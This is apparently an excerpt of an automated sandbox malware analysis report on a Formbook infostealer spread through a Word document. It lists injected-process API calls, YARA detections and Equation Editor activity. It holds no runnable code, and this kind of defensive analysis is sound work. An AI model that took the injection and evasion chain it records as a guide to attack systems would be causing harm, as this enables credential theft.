        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0083FDC0 NtQuerySystemInformation,LdrInitializeThunk,5_2_0083FDC0
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0083FEA0 NtReadVirtualMemory,LdrInitializeThunk,5_2_0083FEA0
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0083FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,5_2_0083FED0
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0083FFB4 NtCreateSection,LdrInitializeThunk,5_2_0083FFB4
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_008410D0 NtOpenProcessToken,5_2_008410D0
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_00840060 NtQuerySection,5_2_00840060
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_008401D4 NtSetValueKey,5_2_008401D4
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0084010C NtOpenDirectoryObject,5_2_0084010C
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_00841148 NtOpenThread,5_2_00841148
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_008407AC NtCreateMutant,5_2_008407AC
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0083F8CC NtWaitForSingleObject,5_2_0083F8CC
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_00841930 NtSetContextThread,5_2_00841930
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0083F938 NtWriteFile,5_2_0083F938
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0083FAB8 NtQueryValueKey,5_2_0083FAB8
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0083FA20 NtQueryInformationFile,5_2_0083FA20
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0083FA50 NtEnumerateValueKey,5_2_0083FA50
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0083FBE8 NtQueryVirtualMemory,5_2_0083FBE8
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0083FB50 NtCreateKey,5_2_0083FB50
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0083FC30 NtOpenProcess,5_2_0083FC30
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_00840C40 NtGetContextThread,5_2_00840C40
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0083FC48 NtSetInformationFile,5_2_0083FC48
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_00841D80 NtSuspendThread,5_2_00841D80
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0083FD5C NtEnumerateKey,5_2_0083FD5C
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0083FE24 NtWriteVirtualMemory,5_2_0083FE24
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0083FFFC NtCreateProcessEx,5_2_0083FFFC
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0083FF34 NtQueueApcThread,5_2_0083FF34
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_026500C4 NtCreateFile,LdrInitializeThunk,7_2_026500C4
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_026507AC NtCreateMutant,LdrInitializeThunk,7_2_026507AC
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0264FAE8 NtQueryInformationProcess,LdrInitializeThunk,7_2_0264FAE8
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0264FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_0264FAD0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0264FB68 NtFreeVirtualMemory,LdrInitializeThunk,7_2_0264FB68
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0264F900 NtReadFile,LdrInitializeThunk,7_2_0264F900
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0264F9F0 NtClose,LdrInitializeThunk,7_2_0264F9F0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0264FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,7_2_0264FED0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0264FDC0 NtQuerySystemInformation,LdrInitializeThunk,7_2_0264FDC0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02650060 NtQuerySection,7_2_02650060
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02650078 NtResumeThread,7_2_02650078
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02650048 NtProtectVirtualMemory,7_2_02650048
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_026510D0 NtOpenProcessToken,7_2_026510D0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02651148 NtOpenThread,7_2_02651148
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0265010C NtOpenDirectoryObject,7_2_0265010C
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_026501D4 NtSetValueKey,7_2_026501D4
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0264FA50 NtEnumerateValueKey,7_2_0264FA50
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0264FA20 NtQueryInformationFile,7_2_0264FA20
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0264FAB8 NtQueryValueKey,7_2_0264FAB8
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0264FB50 NtCreateKey,7_2_0264FB50
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0264FBE8 NtQueryVirtualMemory,7_2_0264FBE8
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0264FBB8 NtQueryInformationToken,7_2_0264FBB8
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0264F8CC NtWaitForSingleObject,7_2_0264F8CC
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02651930 NtSetContextThread,7_2_02651930
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0264F938 NtWriteFile,7_2_0264F938
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0264FE24 NtWriteVirtualMemory,7_2_0264FE24
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0264FEA0 NtReadVirtualMemory,7_2_0264FEA0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0264FF34 NtQueueApcThread,7_2_0264FF34
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0264FFFC NtCreateProcessEx,7_2_0264FFFC
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0264FFB4 NtCreateSection,7_2_0264FFB4
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0264FC60 NtMapViewOfSection,7_2_0264FC60
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02650C40 NtGetContextThread,7_2_02650C40
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0264FC48 NtSetInformationFile,7_2_0264FC48
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0264FC30 NtOpenProcess,7_2_0264FC30
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0264FC90 NtUnmapViewOfSection,7_2_0264FC90
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0264FD5C NtEnumerateKey,7_2_0264FD5C
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02651D80 NtSuspendThread,7_2_02651D80
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0264FD8C NtDelayExecution,7_2_0264FD8C
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_000EA070 NtClose,7_2_000EA070
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_000EA120 NtAllocateVirtualMemory,7_2_000EA120
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_000E9F40 NtCreateFile,7_2_000E9F40
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_000E9FF0 NtReadFile,7_2_000E9FF0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_000EA06C NtClose,7_2_000EA06C
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_000EA11C NtAllocateVirtualMemory,7_2_000EA11C
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_000E9F3B NtCreateFile,7_2_000E9F3B
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_000E9FEA NtReadFile,7_2_000E9FEA
        Source: C:\Users\Public\69577.exeCode function: 4_2_01FD11E0 CreateProcessAsUserW,4_2_01FD11E0
        Source: C:\Users\Public\69577.exeCode function: 4_2_01FD200A4_2_01FD200A
        Source: C:\Users\Public\69577.exeCode function: 4_2_01FC63AB4_2_01FC63AB
        Source: C:\Users\Public\69577.exeCode function: 4_2_01FC48A24_2_01FC48A2
        Source: C:\Users\Public\69577.exeCode function: 4_2_003AB0104_2_003AB010
        Source: C:\Users\Public\69577.exeCode function: 4_2_003AA8104_2_003AA810
        Source: C:\Users\Public\69577.exeCode function: 4_2_003AE8F04_2_003AE8F0
        Source: C:\Users\Public\69577.exeCode function: 4_2_003A04E84_2_003A04E8
        Source: C:\Users\Public\69577.exeCode function: 4_2_003A75004_2_003A7500
        Source: C:\Users\Public\69577.exeCode function: 4_2_003A5DD24_2_003A5DD2
        Source: C:\Users\Public\69577.exeCode function: 4_2_003A52D84_2_003A52D8
        Source: C:\Users\Public\69577.exeCode function: 4_2_003ABAC14_2_003ABAC1
        Source: C:\Users\Public\69577.exeCode function: 4_2_003A8FC14_2_003A8FC1
        Source: C:\Users\Public\69577.exeCode function: 4_2_003AF4024_2_003AF402
        Source: C:\Users\Public\69577.exeCode function: 4_2_003AB0004_2_003AB000
        Source: C:\Users\Public\69577.exeCode function: 4_2_003AE8EF4_2_003AE8EF
        Source: C:\Users\Public\69577.exeCode function: 4_2_003AE8E14_2_003AE8E1
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_008120505_2_00812050
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0008102F5_2_0008102F
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_000810305_2_00081030
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0009E1CA5_2_0009E1CA
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0009D27D5_2_0009D27D
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_00082D905_2_00082D90
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_00089E3C5_2_00089E3C
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_00089E405_2_00089E40
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_00082FB05_2_00082FB0
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0084E0C65_2_0084E0C6
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0087D0055_2_0087D005
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_008530405_2_00853040
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0086905A5_2_0086905A
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_008CD06D5_2_008CD06D
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0084E2E95_2_0084E2E9
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_008F12385_2_008F1238
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_008F63BF5_2_008F63BF
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0084F3CF5_2_0084F3CF
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_008763DB5_2_008763DB
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_008523055_2_00852305
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_008573535_2_00857353
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0089A37B5_2_0089A37B
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_008854855_2_00885485
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_008614895_2_00861489
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_008D443E5_2_008D443E
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0088D47D5_2_0088D47D
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0086C5F05_2_0086C5F0
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0085351F5_2_0085351F
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_008965405_2_00896540
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_008546805_2_00854680
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0085E6C15_2_0085E6C1
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_008F26225_2_008F2622
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0089A6345_2_0089A634
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_008D579A5_2_008D579A
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0085C7BC5_2_0085C7BC
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_008857C35_2_008857C3
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_008EF8EE5_2_008EF8EE
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0085C85C5_2_0085C85C
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0087286D5_2_0087286D
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_008F098E5_2_008F098E
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_008529B25_2_008529B2
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_008669FE5_2_008669FE
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_008D394B5_2_008D394B
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_008D59555_2_008D5955
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_00903A835_2_00903A83
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_008FCBA45_2_008FCBA4
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0084FBD75_2_0084FBD7
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_008DDBDA5_2_008DDBDA
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_00877B005_2_00877B00
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_008EFDDD5_2_008EFDDD
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_00880D3B5_2_00880D3B
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0085CD5B5_2_0085CD5B
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_00882E2F5_2_00882E2F
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0086EE4C5_2_0086EE4C
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_008ECFB15_2_008ECFB1
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_008C2FDC5_2_008C2FDC
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_00860F3F5_2_00860F3F
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 5_2_0087DF7C5_2_0087DF7C
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_027012387_2_02701238
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0265E2E97_2_0265E2E9
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_026AA37B7_2_026AA37B
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_026673537_2_02667353
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_026623057_2_02662305
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0265F3CF7_2_0265F3CF
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_026863DB7_2_026863DB
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_027063BF7_2_027063BF
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_026630407_2_02663040
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0267905A7_2_0267905A
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0268D0057_2_0268D005
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0265E0C67_2_0265E0C6
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_027026227_2_02702622
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_026AA6347_2_026AA634
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0266E6C17_2_0266E6C1
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_026646807_2_02664680
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_026957C37_2_026957C3
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0266C7BC7_2_0266C7BC
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_026E579A7_2_026E579A
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0269D47D7_2_0269D47D
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_026E443E7_2_026E443E
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_026954857_2_02695485
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_026714897_2_02671489
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_026A65407_2_026A6540
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0266351F7_2_0266351F
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0267C5F07_2_0267C5F0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02713A837_2_02713A83
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02687B007_2_02687B00
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0265FBD77_2_0265FBD7
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_026EDBDA7_2_026EDBDA
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0270CBA47_2_0270CBA4
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0268286D7_2_0268286D
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0266C85C7_2_0266C85C
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_026FF8EE7_2_026FF8EE
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_026E394B7_2_026E394B
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_026E59557_2_026E5955
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_026769FE7_2_026769FE
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_026629B27_2_026629B2
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0270098E7_2_0270098E
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0267EE4C7_2_0267EE4C
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02692E2F7_2_02692E2F
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0268DF7C7_2_0268DF7C
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02670F3F7_2_02670F3F
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_026D2FDC7_2_026D2FDC
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_026FCFB17_2_026FCFB1
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0266CD5B7_2_0266CD5B
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_02690D3B7_2_02690D3B
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_026FFDDD7_2_026FFDDD
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_000EE1CA7_2_000EE1CA
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_000D2D907_2_000D2D90
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_000D9E3C7_2_000D9E3C
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_000D9E407_2_000D9E40
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_000D2FB07_2_000D2FB0
        Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe 161BCBF5F7D766B70ACE9CDF7B3B250D256AB601720F09F4183A1FA4F92DCF54
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 0265DF5C appears 119 times
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 0265E2A8 appears 38 times
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 026A3F92 appears 132 times
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 026A373B appears 245 times
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 026CF970 appears 84 times
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: String function: 0084DF5C appears 121 times
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: String function: 00893F92 appears 132 times
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: String function: 008BF970 appears 84 times
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: String function: 0089373B appears 245 times
        Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: String function: 0084E2A8 appears 38 times
        Source: 00000005.00000002.2140353140.0000000000081000.00000020.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000005.00000002.2140353140.0000000000081000.00000020.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000005.00000002.2140526407.00000000004D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000005.00000002.2140526407.00000000004D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000007.00000002.2360758305.00000000000D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000007.00000002.2360758305.00000000000D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000004.00000002.2112664832.0000000003B66000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000004.00000002.2112664832.0000000003B66000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000004.00000002.2112815271.0000000003CD3000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000004.00000002.2112815271.0000000003CD3000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000005.00000002.2140472679.0000000000310000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000005.00000002.2140472679.0000000000310000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 5.2.AddInProcess32.exe.80000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 5.2.AddInProcess32.exe.80000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: explorer.exe, 00000006.00000000.2117611941.0000000003C40000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
        Source: classification engineClassification label: mal100.troj.expl.evad.winDOC@9/13@4/2
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$G-50230.docJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRC467.tmpJump to behavior
        Source: C:\Users\Public\69577.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dllJump to behavior
        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Users\Public\69577.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\Public\69577.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
        Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
